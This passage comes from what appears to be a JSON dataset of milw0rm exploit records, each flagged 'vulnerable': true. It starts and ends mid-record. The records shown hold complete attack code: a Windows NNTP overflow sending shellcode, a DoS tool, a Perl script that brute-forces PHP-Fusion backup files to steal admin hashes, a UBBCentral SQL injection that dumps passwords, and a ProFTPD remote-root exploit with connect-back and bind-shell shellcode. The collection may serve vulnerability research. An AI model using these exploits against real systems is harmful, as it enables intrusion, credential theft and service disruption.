\"\\xEB\\x06\\xEB\\x06\");\n\nmemcpy(&szTmp[4], &(targets[iType].dwJMPEBX),4);\n\nszTmp[8]='\\x0';\n\nstrcpy(szEvil, \"215 list\\r\\ngroup aaaa\");\n\n//for(i=0;i<0x2598;i++)\n\n//for(i=0;i<0x30;i++)\n\nfor(i=0;i<0x2598+0x200;i+=8)\n\nstrcat(szEvil, szTmp);\n\nstrcat(szEvil, (char *)scode);\n\nstrcat(szEvil, \" 1 y\\r\\n.\\r\\n\");\n\nsend(s3, szEvil, strlen(szEvil), 0);\n\nSleep(1000);\n\nclosesocket(s3);\n\nprintf(\"[+] close connection\\n\");\n\n}\n\n\n\nWSACleanup();\n\nreturn;\n\n}\n\n\n\n// milw0rm.com [2005-06-24]",
365        "vulnerable": true
366    },
367    {
368        "exploit_id": 1067,
369        "content": "/*\n\n\n\n IP-DATALOOK Local DoS Exploit\n\n---------------------------------\n\nINFGP - Hacking&security Research\n\n\n\nResolve host...[OK]\n\n [+] Connecting...[OK]\n\nTarget locked\n\nSending bad procedure...[OK]\n\n [*] Server Disconnected!\n\n\n\n Tested on Windows2000 SP4\n\n Infos: infamous.2hell.com / basher13@linuxmail.org\n\n\n\n*/\n\n\n\n#include string.h\n\n#include winsock2.h\n\n#include stdio.h\n\n\n\n#pragma comment(lib, \"ws2_32.lib\")\n\n\n\nchar doscore[] = \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\n\n\"\\x3f\\x3f\\x3f\\x3f\\x3f\\x2e\\x48\\x54\\x4d\\x4c\\x3f\\x74\\x65\\x73\\x74\\x76\"\n\n\"\\x61\\x72\\x69\\x61\\x62\\x6c\\x65\\x3d\\x26\\x6e\\x65\\x78\\x74\\x74\\x65\\x73\"\n\n\"\\x74\\x76\\x61\\x72\\x69\\x61\\x62\\x6c\\x65\\x3d\\x67\\x69\\x66\\x20\\x48\\x54\"\n\n\"\\x54\\x50\\x2f\\x31\\x2e\\x31\\x0a\\x52\\x65\\x66\\x65\\x72\\x65\\x72\\x3a\\x20\"\n\n\"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6c\\x6f\\x63\\x61\\x6c\\x68\\x6f\\x73\\x74\"\n\n\"\\x2f\\x62\\x6f\\x62\\x0a\\x43\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x2d\\x54\\x79\\x70\"\n\n\"\\x65\\x3a\\x20\\x61\\x70\\x70\\x6c\\x69\\x63\\x61\\x74\\x69\\x6f\\x6e\\x2f\\x78\"\n\n\"\\x2d\\x77\\x77\\x77\\x2d\\x66\\x6f\\x72\\x6d\\x2d\\x75\\x72\\x6c\\x65\\x6e\\x63\"\n\n\"\\x6f\\x64\\x65\\x64\\x0a\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x3a\"\n\n\"\\x20\\x4b\\x65\\x65\\x70\\x2d\\x41\\x6c\\x69\\x76\\x65\\x0a\\x43\\x6f\\x6f\\x6b\"\n\n\"\\x69\\x65\\x3a\\x20\\x56\\x41\\x52\\x49\\x41\\x42\\x4c\\x45\\x3d\\x53\\x45\\x43\"\n\n\"\\x55\\x52\\x49\\x54\\x59\\x2d\\x50\\x52\\x4f\\x54\\x4f\\x43\\x4f\\x4c\\x53\\x3b\"\n\n\"\\x20\\x70\\x61\\x74\\x68\\x3d\\x2f\\x0a\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\"\n\n\"\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x34\\x2e\\x37\\x36\"\n\n\"\\x20\\x5b\\x65\\x6e\\x5d\\x20\\x28\\x58\\x31\\x31\\x3b\\x20\\x55\\x3b\\x20\\x4c\"\n\n\"\\x69\\x6e\\x75\\x78\\x20\\x32\\x2e\\x34\\x2e\\x32\\x2d\\x32\\x20\\x69\\x36\\x38\"\n\n\"\\x36\\x29\\x0a\\x56\\x61\\x72\\x69\\x61\\x62\\x6c\\x65\\x3a\\x20\\x72\\x65\\x73\"\n\n\"\\x75\\x6c\\x74\\x0a\\x48\\x6f\\x73\\x74\\x3a\\x20\\x6c\\x6f\\x63\\x61\\x6c\\x68\"\n\n\"\\x6f\\x73\\x74\\x0a\\x43\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x2d\\x6c\\x65\\x6e\\x67\"\n\n\"\\x74\\x68\\x3a\\x20\\x20\\x20\\x20\\x20\\x35\\x31\\x33\\x0a\\x41\\x63\\x63\\x65\"\n\n\"\\x70\\x74\\x3a\\x20\\x69\\x6d\\x61\\x67\\x65\\x2f\\x67\\x69\\x66\\x2c\\x20\\x69\"\n\n\"\\x6d\\x61\\x67\\x65\\x2f\\x78\\x2d\\x78\\x62\\x69\\x74\\x6d\\x61\\x70\\x2c\\x20\"\n\n\"\\x69\\x6d\\x61\\x67\\x65\\x2f\\x6a\\x70\\x65\\x67\\x2c\\x20\\x69\\x6d\\x61\\x67\"\n\n\"\\x65\\x2f\\x70\\x6a\\x70\\x65\\x67\\x2c\\x20\\x69\\x6d\\x61\\x67\\x65\\x2f\\x70\"\n\n\"\\x6e\\x67\\x0a\\x41\\x63\\x63\\x65\\x70\\x74\\x2d\\x45\\x6e\\x63\\x6f\\x64\\x69\"\n\n\"\\x6e\\x67\\x3a\\x20\\x67\\x7a\\x69\\x70\\x0a\\x41\\x63\\x63\\x65\\x70\\x74\\x2d\"\n\n\"\\x4c\\x61\\x6e\\x67\\x75\\x61\\x67\\x65\\x3a\\x20\\x65\\x6e\\x0a\\x41\\x63\\x63\"\n\n\"\\x65\\x70\\x74\\x2d\\x43\\x68\\x61\\x72\\x73\\x65\\x74\\x3a\\x20\\x69\\x73\\x6f\"\n\n\"\\x2d\\x38\\x38\\x35\\x39\\x2d\\x31\\x2c\\x2a\\x2c\\x75\\x74\\x66\\x2d\\x38\\x0a\"\n\n\"\\x0a\\x0a\\x77\\x68\\x61\\x74\\x79\\x6f\\x75\\x74\\x79\\x70\\x65\\x64\\x3d\\x41\"\n\n\"\\x69\\x6d\\x61\\x67\\x65\\r\\n\";\n\n\n\nint main(int argc, char *argv[])\n\n{\n\nWSADATA wsaData;\n\nWORD wVersionRequested;\n\nstruct hostent *pTarget;\n\nstruct sockaddr_in sock;\n\nchar *target;\n\nint port,bufsize;\n\nSOCKET inetdos;\n\n\n\nif (argc < 2)\n\n{\n\nprintf(\" \\n\", argv[0]);\n\nprintf(\"       IP-DATALOOK Local DoS Exploit \\n\", argv[0]);\n\nprintf(\"  -------------------------------------\\n\", argv[0]);\n\nprintf(\"    INFGP - Hacking&Security Research\\n\\n\", argv[0]);\n\nprintf(\"[-]Usage: %s [target] [port]\\n\", argv[0]);\n\nprintf(\"[?]Exam: localhost 80\\n\", argv[0]);\n\nexit(1);\n\n}\n\n\n\nwVersionRequested = MAKEWORD(1, 1);\n\nif (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;\n\n\n\ntarget = argv[1];\n\nport = 80;\n\n\n\nif (argc >= 3) port = atoi(argv[2]);\n\nbufsize = 1024;\n\nif (argc >= 4) bufsize = atoi(argv[3]);\n\n\n\ninetdos = socket(AF_INET, SOCK_STREAM, 0);\n\nif(inetdos==INVALID_SOCKET)\n\n{\n\nprintf(\"Socket ERROR \\n\");\n\nexit(1);\n\n}\n\n\n\nprintf(\"Resolve host... \");\n\nif ((pTarget = gethostbyname(target)) == NULL)\n\n{\n\nprintf(\"FAILED \\n\", argv[0]);\n\nexit(1);\n\n}\n\nprintf(\"[OK]\\n \");\n\nmemcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);\n\nsock.sin_family = AF_INET;\n\nsock.sin_port = htons((USHORT)port);\n\n\n\nprintf(\"[+] Connecting... \");\n\nif ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))\n\n{\n\nprintf(\"FAILED\\n\");\n\nexit(1);\n\n}\n\nprintf(\"[OK]\\n\");\n\nprintf(\"Target locked\\n\");\n\nprintf(\"Sending bad procedure... \");\n\nif (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)\n\n{\n\nprintf(\"ERROR\\n\");\n\nclosesocket(inetdos);\n\nexit(1);\n\n}\n\nprintf(\"[OK]\\n \");\n\nprintf(\"[+] Server Disconnected!\\n\");\n\nclosesocket(inetdos);\n\nWSACleanup();\n\nreturn 0;\n\n}\n\n\n\n// milw0rm.com [2005-06-25]",
370        "vulnerable": true
371    },
372    {
373        "exploit_id": 1068,
374        "content": " #!/usr/bin/perl\n\n ######################################################\n\n #  D A R K   A S S A S S I N S   C R E W   2 0 0 5   #\n\n ######################################################\n\n # Dark Assassins - http://dark-assassins.com/        #\n\n # Visit us on IRC @ irc.tddirc.net #DarkAssassins    #\n\n ######################################################\n\n # phpfusiondb.pl; Version 0.1 22/06/05               #\n\n # PHP-Fusion db backup proof-of-concept by Easyex    #\n\n # Database backup vuln in v6.00.105 and below        #\n\n ######################################################\n\n # Description: When a db (database) backup is made   #\n\n # it is saved in /administration/db_backups/ on 6.0  #\n\n # and on 5.0 it is saved in /fusion_admin/db_backups/#\n\n # The backup file can be saved in 2 formats: .sql or #\n\n # .sql.gz and is hidden by a blank index.php file but#\n\n # can be downloaded client-side, The filename is for #\n\n # example : backup_2005-06-22_2208.sql.gz so what we #\n\n # can do is generate 0001 to 9999 and request the    #\n\n # file and download it. If a db file is found an     #\n\n # attacker can get the admin hash and crack  it or   #\n\n # retrieve other sensitive information from the db!  #\n\n ######################################################\n\n\n\n # 9999 requests to the host is alot, And would get noticed in the server log!\n\n # If you re-coded your own script with proxy support you would be fine.\n\n # You need to know the backup year-month-day to be able to find a backup file unless the server is set to automaticlly   \n\n # backup the php-fusiondatabase.\n\n\n\n my $wget='wget';\n\n\n\n my $count='0';\n\n\n\n my $target;\n\n\n\n if (@ARGV < 4)\n\n{\n\n print \"\\n\";\n\n print \"Welcome to the PHP-Fusion db backup vulnerability\\n\";\n\n print \"Coded by Easyex from the Dark Assassins crew\\n\";\n\n print \"\\n\";\n\n print \"Usage: phpfusiondb.pl <host> <version> <file> <extension>\\n\";\n\n print \"Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gz\\n\";\n\n print \"\\n\";\n\n exit();\n\n}\n\n\n\n my $host = $ARGV[0];\n\n my $ver = $ARGV[1];\n\n my $file = $ARGV[2];\n\n my $extension = $ARGV[3];\n\n\n\n if ($ver eq \"6\") {\n\n       $dir='/administration/db_backups/'; # Directory path to the 6.X backup folder\n\n }\n\n\n\n if ($ver eq \"5\") {\n\n       $dir='/fusion_admin/db_backups/'; # Directory path to the 5.X backup folder\n\n}\n\n\n\n print \"\\n\";\n\n print \"Welcome to the PHP-Fusion db backup vulnerability\\n\";\n\n print \"Coded by Easyex from the Dark Assassins crew\\n\";\n\n print \"\\n\";\n\n\n\n print \"Host: $host\\n\";\n\n print \"Directory: $dir\\n\";\n\n print \"File: $file + 0001 to 9999\\n\";\n\n print \"Extension: $extension\\n\";\n\n print \"\\n\";\n\n print \"Attempting to find a db backup file on $host\\n\";\n\n\n\n for($count=0;$count<9999;$count++) {\n\n\n\n    $target=$host.$dir.$file.sprintf(\"%04d\", $count).$extension;\n\n\n\n    system(\"$wget $target\");\n\n }\n\n\n\n# milw0rm.com [2005-06-25]",
375        "vulnerable": true
376    },
377    {
378        "exploit_id": 1069,
379        "content": "<?php\n\n#############################################################################\n\n#      T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m\n\n#############################################################################\n\n# Vulnerable:   UBBCentral SQL Injection\n\n#\n\n# Exploit By :  MH_p0rtal\n\n#\n\n# Discovered By: James Bercegay\n\n#############################################################################\n\n#  Gr33tz To ==>   Alpha_programmer , Oil_karchack , The_CephaleX , Str0ke\n\n#\n\n#  And Iranian Hacking & Security Teams :\n\n#  IHS TeaM , alphaST , Shabgard Security Team  , Emperor Hacking Team  ,\n\n#  Crouz Security Team  & Simorgh-ev Security Team\n\n#############################################################################\n\n# ___________Config :\n\n# please replace your address :\n\n$url = \"http:///www.example.com\";\n\n# please replace your dir address :\n\n$dirs = \"/dir/to/ubbt/\";\n\n# __________End Config\n\n#############################################################################\n\n$aa = strlen ( $dirs );\n\n$ab = $aa - 1;\n\n$ac = 0;\n\nif ((  $dirs[$ab] == \"/\" )  &&  ( $dirs[$ac] == \"/\" ))   {\n\n$merg = $dirs.mailthread.php;\n\n$fc = fsockopen(\"$url\", 80, $errno, $errstr, 30);\n\nif (!$fc) {\n\n\n\necho \"Can't Connect\\n\";\n\n} else {\n\n   $mh = \"GET $merg?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1&fpart=1&what=showflat  HTTP/1.1\\r\\n\";\n\n   $mh .= \"Host: $url\\r\\n\";\n\n   $mh .= \"Connection: Close\\r\\n\\r\\n\";\n\n\n\n  fwrite($fc, $mh);\n\n  while (!feof($fc)) {\n\n  echo fgets($fc, 1024);\n\n  }\n\n   fclose($fc);\n\n}\n\n} else {\n\necho \" Your pattern doesn't equal with Exploit directory pattern \";\n\n}\n\n?>\n\n\n\n# milw0rm.com [2005-06-25]",
380        "vulnerable": true
381    },
382    {
383        "exploit_id": 107,
384        "content": "/* proftpd 1.2.7/1.2.9rc2 remote root exploit by bkbll (bkbll#cnhonker.net, 2003/10/1)\n\n* for FTP_ProFTPD_Translate_Overflow  found by X-force\n\n* happy birthday, China.\n\n* this code is dirty, there are more beautiful exploits of proftpd for this vuln in the world.\n\n* this code want to provied u a method, not finally exploit.\n\n* using overflow _xlate_ascii_write function return address.\n\n* because the overflow is before it connecting to our port,so I have no method for using current socket.\n\n* and I have provied two method:bind port and connect back.\n\n*/\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <unistd.h>\n\n#include <errno.h>\n\n#include <netdb.h>\n\n#include <string.h>\n\n#include <signal.h>\n\n#include <sys/socket.h>\n\n#include <sys/types.h>\n\n#include <sys/time.h>\n\n#include <sys/select.h>\n\n#include <netinet/in.h>\n\n#include <arpa/inet.h>\n\n\n\n#define PORT 21\n\n#define SIZE 1024\n\n#define BIGSIZE 1024*42\n\n#define OFFSET 39         //cbshellcode ip & port offset,0 is the first\n\n#define OFF2   70         //bindshellcode port offset,0 is the first\n\n#define VER \"1.20\"\n\n\n\nchar cbshellcode[]= //from www.netric.org,and modified some code by myself\n\n\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb0\\x17\"\n\n\"\\xcd\\x80\\x31\\xc0\\x51\\xb1\\x06\\x51\"\n\n\"\\xb1\\x01\\x51\\xb1\\x02\\x51\\x89\\xe1\"\n\n\"\\xb3\\x01\\xb0\\x66\\xcd\\x80\\x89\\xc2\"\n\n\"\\x31\\xc0\\x31\\xc9\\x51\\x51\\x68\\x41\"\n\n\"\\x42\\x43\\x44\\x66\\x68\\xb0\\xef\\xb1\"\n\n\"\\x02\\x66\\x51\\x90\\x89\\xe7\\xb3\\x10\"\n\n\"\\x53\\x57\\x52\\x89\\xe1\\xb3\\x03\\xb0\"\n\n\"\\x66\\xcd\\x80\\x31\\xc9\\x39\\xc1\\x74\"\n\n\"\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\"\n\n\"\\xc0\\xb0\\x3f\\x89\\xd3\\xcd\\x80\\x31\"\n\n\"\\xc0\\xb0\\x3f\\x89\\xd3\\xb1\\x01\\xcd\"\n\n\"\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xb1\"\n\n\"\\x02\\xcd\\x80\\x31\\xc9\\x51\\x68\\x6e\"\n\n\"\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\"\n\n\"\\x89\\xe3\\x51\\x68\\x2d\\x69\\x69\\x70\"\n\n\"\\x89\\xe2\\x51\\x52\\x53\\x89\\xe1\\x31\"\n\n\"\\xd2\\x31\\xc0\\xb0\\x0b\\xcd\\x80\\x31\"\n\n\"\\xc0\\xb0\\x01\\xcd\\x80\";\n\nchar bindshellcode[]= //from www.netric.org,and modified some code by myself\n\n\"\\x90\\x90\\x90\\x31\\xc0\\x31\\xdb\\x31\"\n\n\"\\xc9\\xb0\\x17\\xcd\\x80\\x31\\xc0\\xb0\"\n\n\"\\x02\\xcd\\x80\\x39\\xc3\\x7c\\x0c\\x31\"\n\n\"\\xc0\\xb0\\x02\\xcd\\x80\\x39\\xc3\\x7c\"\n\n\"\\x02\\xeb\\x06\\x31\\xc0\\xb0\\x01\\xcd\"\n\n\"\\x80\\x51\\x31\\xc0\\x51\\xb1\\x01\\x51\"\n\n\"\\xb1\\x02\\x51\\x89\\xe1\\xb3\\x01\\xb0\"\n\n\"\\x66\\xcd\\x80\\x89\\xc1\\x31\\xc0\\x31\"\n\n\"\\xdb\\x50\\x50\\x50\\x66\\x68\\xb0\\xef\"\n\n\"\\xb3\\x02\\x66\\x53\\x89\\xe2\\xb3\\x10\"\n\n\"\\x53\\xb3\\x02\\x52\\x51\\x89\\xca\\x89\"\n\n\"\\xe1\\xb0\\x66\\xcd\\x80\\x31\\xdb\\x39\"\n\n\"\\xc3\\x74\\x05\\x31\\xc0\\x40\\xcd\\x80\"\n\n\"\\x31\\xc0\\x50\\x52\\x89\\xe1\\xb3\\x04\"\n\n\"\\xb0\\x66\\xcd\\x80\\x89\\xd7\\x31\\xc0\"\n\n\"\\x31\\xdb\\x31\\xc9\\xb3\\x11\\xb1\\x01\"\n\n\"\\xb0\\x30\\xcd\\x80\\x31\\xc0\\x31\\xdb\"\n\n\"\\x50\\x50\\x57\\x89\\xe1\\xb3\\x05\\xb0\"\n\n\"\\x66\\xcd\\x80\\x89\\xc6\\x31\\xc0\\x31\"\n\n\"\\xc9\\x89\\xf3\\xb0\\x3f\\xcd\\x80\\x31\"\n\n\"\\xc0\\x41\\xb0\\x3f\\xcd\\x80\\x31\\xc0\"\n\n\"\\x41\\xb0\\x3f\\xcd\\x80\\x31\\xc9\\x51\"\n\n\"\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\"\n\n\"\\x62\\x69\\x89\\xe3\\x51\\x68\\x2d\\x69\"\n\n\"\\x69\\x69\\x89\\xe2\\x51\\x52\\x53\\x89\"\n\n\"\\xe1\\x31\\xd2\\x31\\xc0\\xb0\\x0b\\xcd\"\n\n\"\\x80\";\n\n\n\nint sockfd,sockfd1,sockfd2;\n\nint show=0;\n\nint mustread=0;\n\nint getshell=0;\n\nint pt=6000;\n\nunsigned int type=1;\n\nchar bindmethod=0;\n\nchar usrstr[]=\"USER\";\n\nchar passtr[]=\"PASS\";\n\nchar ascistr[]=\"TYPE A\";\n\nchar pasvstr[]=\"PASV\";\n\nchar portstr[]=\"PORT\";\n\nchar storstr[]=\"STOR\";\n\nchar retrstr[]=\"RETR\";\n\nchar cmdbuf[SIZE];\n\nchar srvbuf[SIZE];\n\nchar *cbhost=NULL;\n\nchar *server=NULL;\n\n        \n\nstruct\n\n{\n\n char *os;\n\n unsigned int ret;\n\n int backup; //using for next\n\n} targets[] =\n\n     {\n\n          { \"rh8.0 ProFTPD 1.2.8 (stable) 1\", 0xbffff25c,0},\n\n          { \"rh8.0 ProFTPD 1.2.8 (stable) 2\", 0xbffff22c,0},\n\n    },v;\n\n//main() {}\n\nint sendbuf(int socket,char *buffer,int len);\n\nint readbuf(char *s,int socket,char *buffer,int len);\n\nint client_connect(int sockfd,char* server,int port);\n\nvoid checkstatus(char *s);\n\nvoid retrfile(char *s,int len,int port);\n\nvoid storfile(char *s,int len,int port);\n\nint dealpasv(char *s);\n\nint setpasv();\n\nvoid setport(char *l,int pt1);\n\nvoid quit();\n\nvoid storbuf(char *filename,char *buf,int size,int port);\n\nvoid retrbuf(char *filename,char *buffer,int length,int port1);\n\nvoid setascii();\n\nvoid loginftp(char *user,char *pass);\n\nvoid setfilename(char *s,int len);\n\nint createbuffer(char *s,int len,int type,char *h);\n\nint create_serv(int sfd,int port);\n\nvoid modify(char *s,char *h,int port3);\n\nvoid usage(char *s);\n\nint execsh(int clifd);\n\nint checklf(void *s,int len);\n\n\n\nmain(int argc,char **argv)\n\n{\n\n    char buffer[BIGSIZE];\n\n    char cmdbuf[SIZE];\n\n    char srvbuf[SIZE];\n\n    char filename[30];\n\n    int j,a,b,port1;\n\n    int total;\n\n    char c;\n\n    char *user=NULL;\n\n    char *pass=NULL;\n\n    char *localip=NULL;\n\n    \n\n    if(argc<2) usage(argv[0]);\n\n    while((c = getopt(argc, argv, \"d:t:u:p:l:h:o:\"))!= EOF)\n\n      {\n\n            switch (c)\n\n            {\n\n              case 'd':\n\n                  server=optarg;\n\n                  break;\n\n              case 't':\n\n                  type = atoi(optarg);\n\n                  if((type > sizeof(targets)/sizeof(v)) || (type < 1))\n\n                       usage(argv[0]);\n\n                  break;\n\n             case 'u':\n\n                  user=optarg;\n\n                   break;\n\n             case 'p':\n\n                  pass=optarg;\n\n                   break;\n\n             case 'l':\n\n                  localip=optarg;\n\n                   break;\n\n             case 'h':\n\n                   cbhost=optarg;\n\n                   break;\n\n             case 'o':\n\n                    pt=atoi(optarg) & 0xffff;\n\n                    break;\n\n             default:\n\n                  usage(argv[0]);\n\n                  return 1;\n\n              }\n\n          }\n\n          if(server==NULL || user==NULL || pass==NULL || localip==NULL)\n\n              usage(argv[0]);\n\n       printf(\"@---------------------------------------------------------@\\n\");\n\n    printf(\"# proftpd 1.2.7/1.2.9rc2 remote root exploit(01/10)-%s  #\\n\",VER);\n\n    printf(\"@    by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com      @\\n\");\n\n    printf(\"-----------------------------------------------------------\\n\");      \n\n    printf(\"[+] Ret address:%p\\n\",targets[type-1].ret);         \n\n          if(cbhost==NULL)\n\n        bindmethod=1;\n\n    else\n\n    {\n\n        if((int)inet_addr(cbhost)==-1)\n\n        {\n\n            printf(\"[-] Invalid connect back host/ip\\n\");\n\n            exit(0);\n\n        }\n\n        bindmethod=0;\n\n    }\n\n    port1=34568;              //PORT\u00c3\u00fc\u00c1\u00ee\u00b5\u00c4\u00ca\u00b1\u00ba\u00f2\u00d4\u00da\u00b1\u00be\u00b5\u00d8\u00b2\u00fa\u00c9\u00fa\u00b5\u00c4\u00d2\u00bb\u00b8\u00f6\u00b6\u00cb\u00bf\u00da.\n\n    sockfd=sockfd1=sockfd2=0;\n\n    sockfd=socket(2,1,0);\n\n    if(client_connect(sockfd,server,PORT)<0) quit();\n\n    loginftp(user,pass);\n\n    //port1=setpasv(); //get the pasv port\n\n    setport(localip,port1);\n\n    setfilename(filename,30);\n\n    setascii();\n\n    total=createbuffer(buffer,BIGSIZE,type,cbhost);\n\n    //printf(\"[+] buffer data size:%d\\n\",total);\n\n    storbuf(filename,buffer,total,port1);\n\n    //stor over, then close and reconnect\n\n    close(sockfd);\n\n    close(sockfd1);\n\n    close(sockfd2);\n\n    \n\n    sockfd=socket(2,1,0);\n\n    if(client_connect(sockfd,server,PORT)<0) quit(); //reconnect\n\n    loginftp(user,pass);\n\n    setascii();\n\n    \n\n    setport(localip,port1); //get the pasv port,a new one\n\n    mustread=total;\n\n    retrbuf(filename,buffer,total,port1);\n\n    readbuf(\"The First time read\",sockfd,srvbuf,SIZE);\n\n    port1++;\n\n    setport(localip,port1);\n\n    mustread=total;\n\n    getshell=1;\n\n    \n\n    retrbuf(filename,buffer,total,port1);\n\n    quit();\n\n}\n\nvoid setfilename(char *s,int len)\n\n{\n\n    int a;\n\n    \n\n    memset(s,0,len);\n\n    a=getpid();\n\n    sprintf(s,\"%d%d%d.txt\",a,a,a);\n\n}\n\n\n\nvoid retrfile(char *s,int len,int port)\n\n{\n\n    int i,pid;\n\n    char data1;\n\n    struct sockaddr_in client;\n\n    \n\n    memset(&client,0,sizeof(client));\n\n    sockfd1=socket(2,1,0);\n\n    if(create_serv(sockfd1,port)<0) quit();\n\n    i=sizeof(client);\n\n      sockfd2=accept(sockfd1,(struct sockaddr *)&client,&i);\n\n      printf(\"[+] Accepted a client from %s\\n\",inet_ntoa(client.sin_addr));\n\n      memset(s,0,len);\n\n      if(getshell==1)\n\n    {\n\n        if(bindmethod==0)\n\n        {\n\n            printf(\"[+] Is it a shell on %s:%d?\\n\",cbhost,pt);\n\n            quit();\n\n        }\n\n        else\n\n        {\n\n            printf(\"[+] Waiting for a shell.....\\n\");\n\n            sockfd2=socket(AF_INET,SOCK_STREAM,0);\n\n            sleep(2);\n\n            client_connect(sockfd2,server,pt);\n\n            execsh(sockfd2);\n\n            quit();\n\n        }\n\n    }\n\n    readbuf(NULL,sockfd2,s,len);\n\n      close(sockfd2);\n\n    close(sockfd1);\n\n    \n\n}\n\n\n\nvoid storfile(char *s,int len,int port)\n\n{\n\n    int i;\n\n    struct sockaddr_in client;\n\n    \n\n    memset(&client,0,sizeof(client));\n\n    sockfd1=socket(2,1,0);\n\n    if(create_serv(sockfd1,port)<0) quit();\n\n    //if(client_connect(sockfd1,HOST,port)<0) quit();\n\n    i=sizeof(client);\n\n      sockfd2=accept(sockfd1,(struct sockaddr *)&client,&i);\n\n      printf(\"[+] Accepted a client from %s\\n\",inet_ntoa(client.sin_addr));\n\n      sendbuf(sockfd2,s,len);\n\n      close(sockfd2);\n\n    close(sockfd1);\n\n}\n\nvoid setport(char *l,int pt1)\n\n{\n\n    int a,i,b,c,j;\n\n    char buf[30];\n\n    \n\n    memset(buf,0,30);\n\n    i=sprintf(buf,\"%s\",l);\n\n    for(a=0;a<i;a++)\n\n        if(buf[a]=='.') buf[a]=',';    \n\n    memset(cmdbuf,0,SIZE);\n\n    b=(pt1 >> 8 ) & 0xff;\n\n    c=pt1 & 0xff;\n\n    j=sprintf(cmdbuf,\"%s %s,%d,%d\\r\\n\",portstr,buf,b,c);\n\n    printf(\"[+] %s\",cmdbuf);\n\n    sendbuf(sockfd,cmdbuf,j);\n\n    readbuf(NULL,sockfd,srvbuf,SIZE);\n\n    checkstatus(srvbuf);    \n\n}\n\n\n\nint dealpasv(char *s)\n\n{\n\n    int a,b,c,d,e,f,g;\n\n    char *p1,*p2,*p3;\n\n    int i;\n\n    \n\n    p1=(char *)malloc(100);\n\n    if(!s)\n\n        quit();    \n\n    p2=strchr(s,'(');\n\n    //printf(\"p2:%s\\n\",p2);\n\n    p3=strchr(s,')');\n\n    //printf(\"p3:%s\\n\",p3);\n\n    p3++;\n\n    i=p3-p2;\n\n    memcpy(p1,p2,i);\n\n    p1[i]='\\0';\n\n    //printf(\"p1:%s\\n\",p1);\n\n    sscanf(p1,\"(%d,%d,%d,%d,%d,%d)\",&a,&b,&c,&d,&e,&f);\n\n    //printf(\"a:%d,b:%d,c:%d,d:%d,e:%d,f:%d\\n\",a,b,c,d,e,f);\n\n    g=(e<<8) | f;\n\n    //printf(\"port:%d\\n\",g);\n\n    free(p1);\n\n    return g;\n\n}\n\n\n\nvoid quit()\n\n{\n\n    if(sockfd>0)\n\n        close(sockfd);\n\n    if(sockfd1>0)\n\n        close(sockfd);\n\n    if(sockfd2>0)\n\n        close(sockfd);    \n\n    exit(0);\n\n}\n\nint sendbuf(int socket,char *buffer,int len)\n\n{\n\n    int j;\n\n    \n\n    j=send(socket,buffer,len,0);\n\n    if(j==0)\n\n    {\n\n        printf(\"[-] server closed the socket\\n\");\n\n        quit();\n\n    }    \n\n    if(j<0)\n\n    {\n\n        perror(\"[-] Send data error\");\n\n        quit();\n\n    }\n\n    return j;\n\n}\n\n\n\nint readbuf(char *s,int socket,char *buffer,int len)\n\n{\n\n    int a,b,i,j=0;\n\n    \n\n    a=b=i=0;\n\n    memset(buffer,0,len);\n\n    if(s)\n\n    {\n\n        printf(\"[+] %s:\",s);\n\n        fflush(stdout);\n\n    }\n\n    //j=lseek(socket,0,2);\n\n    //printf(\"j:%d\\n\",j);\n\n    if(mustread==0)\n\n    {\n\n        j=recv(socket,buffer,len-1,0);\n\n        if(j==0)\n\n        {\n\n            if(s)\n\n                printf(\"FAILED\\n\");\n\n            printf(\"[-] server closed the socket\\n\");\n\n            quit();\n\n        }    \n\n        if(j<0)\n\n        {\n\n            if(s)\n\n                printf(\"FAILED\\n\");\n\n            perror(\"[-] read data error\");\n\n            quit();\n\n        }\n\n        if(s)\n\n            printf(\"ok\\n\");\n\n        buffer[len-1]='\\0';\n\n        if(show==1)\n\n            printf(\"<== %s\",buffer);\n\n    }\n\n    else\n\n    {\n\n        //\u00ce\u00d2\u00c3\u00c7\u00b2\u00bb\u00d3\u00c3\u00b9\u00d8\u00d0\u00c4\u00b7\u00b5\u00bb\u00d8\u00d2\u00bb\u00d0\u00a9\u00ca\u00b2\u00c3\u00b4\u00ca\u00fd\u00be\u00dd\n\n        b=mustread-i;\n\n        while(b>0)\n\n        {\n\n            \n\n            a=b>(len-1)?(len-1):b;\n\n            i=recv(socket,buffer,a,0);\n\n            if(i==0)\n\n            {\n\n                if(s)\n\n                    printf(\"FAILED\\n\");\n\n                printf(\"[-] server closed the socket\\n\");\n\n                quit();\n\n            }    \n\n            if(i<0)\n\n            {\n\n                if(s)\n\n                    printf(\"FAILED\\n\");\n\n                perror(\"[-] read data error\");\n\n                quit();\n\n            }\n\n            if(s)\n\n                printf(\"ok\\n\");\n\n            b-=i;\n\n            j+=i;\n\n        }\n\n        //printf(\"j:%d,mustread:%d\\n\",j,mustread);\n\n        if(j!=mustread)\n\n        {\n\n            printf(\"read failed\\n\");\n\n            quit();\n\n        }\n\n    }\n\n    //show=0;\n\n    mustread=0;\n\n    return j;\n\n}\n\n\n\nint client_connect(int sockfd,char* server,int port)\n\n{\n\n    struct sockaddr_in cliaddr;\n\n    struct hostent *host;\n\n    \n\n    if((host=gethostbyname(server))==NULL)\n\n    